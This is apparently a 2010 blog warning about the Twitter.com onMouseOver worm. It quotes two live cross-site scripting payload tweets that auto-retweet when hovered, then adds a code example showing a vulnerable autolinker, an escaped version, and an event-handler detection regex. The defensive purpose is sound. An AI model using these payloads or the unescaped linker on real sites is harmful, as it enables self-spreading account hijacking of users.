Tuesday, September 21, 2010

Twitter under attack, stop using Twitter.com until the problem is fixed.

If you're a user of Twitter, you probably noticed today that many of the people you follow are tweeting strange things. The cause is an exploit in Twitter.com: the website fails to block the "onMouseOver" JavaScript event handler inside tweets, which means that if you simply move the mouse over an offending tweet, you'll automatically retweet it or be redirected to another website.

This is what such a message looks like (DO NOT click on those links!!):
http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/
or another one:
http://t.co/@"onmouseover="document.getElementById('status').value='RT Unlevin ';$('.status-update-form').submit();"class="modal-overlay"/
It seems that most third-party clients aren't affected by the exploit. Stop using Twitter's official website for now, as the strange messages are still coming in. In any case, DO NOT click on the websites those tweets link to; they may try to install malicious code on your computer.
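As an added illustration (not Twitter's code), here is a toy tweet autolinker with the flaw described above, beside a hardened version that attribute-encodes the URL before inserting it into HTML. The URL regex, the function names and the event-handler check are assumptions made for this example; the sample tweet is copied from the first message quoted above.

```javascript
// Added example, not Twitter's code. A URL is assumed to run from "http(s)://"
// up to the first whitespace (simplified rule for the demo).
const URL_RE = /https?:\/\/\S+/g;

// Vulnerable: the URL text lands inside href="..." verbatim, so a " in the
// URL closes the attribute and whatever follows becomes new attributes.
function linkifyVulnerable(text) {
  return text.replace(URL_RE, (url) => `<a href="${url}">${url}</a>`);
}

// Hardened: encode every character that can end an attribute value or open a
// tag before interpolating untrusted text into markup.
function escapeHtmlAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

function linkifySafe(text) {
  return text.replace(URL_RE, (url) => {
    const safe = escapeHtmlAttr(url);
    return `<a href="${safe}">${safe}</a>`;
  });
}

// Detection helper for rendered markup: an on* attribute that appears right
// after a quote or whitespace, i.e. in attribute position rather than in text.
function hasEventHandlerAttr(html) {
  return /["'\s]on[a-z]+\s*=/i.test(html);
}

// Sample input: the first tweet quoted in the post above.
const SAMPLE_TWEET = `http://a.no/@"onmouseover=";$('textarea:first').val(this.innerHTML);$('.status-update-form').submit()" style="color:#000;background:#000;/`;

console.log('vulnerable:', linkifyVulnerable(SAMPLE_TWEET));
console.log('hardened:  ', linkifySafe(SAMPLE_TWEET));
```

The hardened output still shows the strange text, but only as an inert attribute value and link label; no event handler attribute is created.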

Twitter hasn't announced anything about this yet, but they'll surely notify users when Twitter.com is safe again, so follow status.twitter.com for the latest news.

